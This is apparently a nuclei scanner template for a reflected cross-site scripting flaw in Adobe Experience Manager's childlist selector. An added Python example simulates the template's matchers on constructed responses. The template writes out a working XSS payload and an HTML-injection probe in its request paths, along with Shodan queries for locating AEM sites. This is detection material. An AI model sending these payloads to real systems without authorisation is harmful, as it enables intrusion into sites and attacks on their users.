id: aem-xss-childlist

info:
  name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
  author: theabhinavgaur
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
  metadata:
    verified: true
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: xss,aem,adobe

requests:
  - method: GET
    path:
      - "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
      - "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        name: xss
        words:
          - '<img src="x" data onerror="alert(domain)"/>'
          - 'data-coral-columnview-id'
        condition: and

      - type: word
        part: body
        name: html_injection
        words:
          - '<br /><br />please authenticate<br /><br />'
          - 'data-coral-columnview-id'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
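As an added example, not part of the template above or of nuclei itself, the following Python reproduces how the template's matchers are evaluated against a response, using two constructed sample responses (one where the dispatcher flipped the content type to text/html, one where it kept application/json) together with a direct check for the content-type flip that the description names as the root cause. The matcher dictionaries, the Response class and the sample bodies are this example's own constructions.

```python
from dataclasses import dataclass

@dataclass
class Response:
    status: int
    content_type: str
    body: str

# Matchers transcribed from the template: a word matcher needs all of its
# words when condition is "and", any of them otherwise.
MATCHERS = [
    {"name": "xss", "type": "word", "part": "body", "condition": "and",
     "words": ['<img src="x" data onerror="alert(domain)"/>',
               'data-coral-columnview-id']},
    {"name": "html_injection", "type": "word", "part": "body", "condition": "and",
     "words": ['<br /><br />please authenticate<br /><br />',
               'data-coral-columnview-id']},
    {"name": "content_type", "type": "word", "part": "content_type",
     "condition": "or", "words": ["text/html"]},
    {"name": "status", "type": "status", "status": [200]},
]

def matcher_hits(m: dict, r: Response) -> bool:
    """One matcher against one response, following nuclei's word/status semantics."""
    if m["type"] == "status":
        return r.status in m["status"]
    haystack = r.body if m["part"] == "body" else r.content_type
    found = [w in haystack for w in m["words"]]
    return all(found) if m["condition"] == "and" else any(found)

def evaluate(r: Response, matchers_condition: str = "or") -> tuple[bool, list[str]]:
    """Return (template matched?, names of the matchers that fired)."""
    fired = [m["name"] for m in MATCHERS if matcher_hits(m, r)]
    matched = bool(fired) if matchers_condition == "or" else len(fired) == len(MATCHERS)
    return matched, fired

def dispatcher_flipped_type(r: Response) -> bool:
    """Root-cause check: a childrenlist response should be JSON, never text/html."""
    return r.content_type.split(";")[0].strip().lower() == "text/html"

# Constructed sample responses (not captured from a real system).
VULNERABLE = Response(200, "text/html;charset=utf-8",
    '<div data-coral-columnview-id="1"><img src="x" data onerror="alert(domain)"/></div>')
HARDENED = Response(200, "application/json;charset=utf-8",
    '{"path":"/xyz&lt;img src=x&gt;.childrenlist","children":[]}')

if __name__ == "__main__":
    for label, resp in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, evaluate(resp), "content-type flipped:", dispatcher_flipped_type(resp))
```

Because matchers-condition is `or`, the status and content_type matchers satisfy the template on their own; the returned list of fired matcher names shows which one produced the match, so a hit from status alone can be told apart from a genuine body reflection.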